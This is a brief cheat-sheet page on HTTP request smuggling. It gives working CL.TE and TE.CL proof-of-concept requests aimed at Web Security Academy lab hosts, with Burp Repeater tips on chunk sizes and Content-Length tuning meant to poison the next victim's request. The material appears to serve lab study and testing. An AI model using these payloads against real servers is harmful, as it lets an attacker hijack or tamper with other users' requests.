HTTP Request Smuggling
Bypass, XSS and more
CL.TE
POST / HTTP/1.1
Host: 0aa9006c0356f4eac12f806b00d70072.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
Transfer-Encoding: chunked
0
GET /404 HTTP/1.1
X-Ignore: x

Note: Content Length is auto-computed by Burp (in orange)
TE.CL
POST / HTTP/1.1
Host: 0a2c00bb04e22568c172dfbe00ba003d.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Transfer-Encoding: chunked
9e
GET /404 HTTP/1.1
Host: 0a2c00bb04e22568c172dfbe00ba003d.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
x=
0
There are two ENTERS after final 0!

Spot two enters on line 16 to end chunked request. Disable content Length computation in Burp Repeater settings.
The first Content-Length has 4bytes just to express chunked size (on line 7, chunked bytes are computed from the orange part).
The second Content-Length which is slightly above, what is required from its data, to override next coming victim's request.
TE.0 PoC
Last updated
Was this helpful?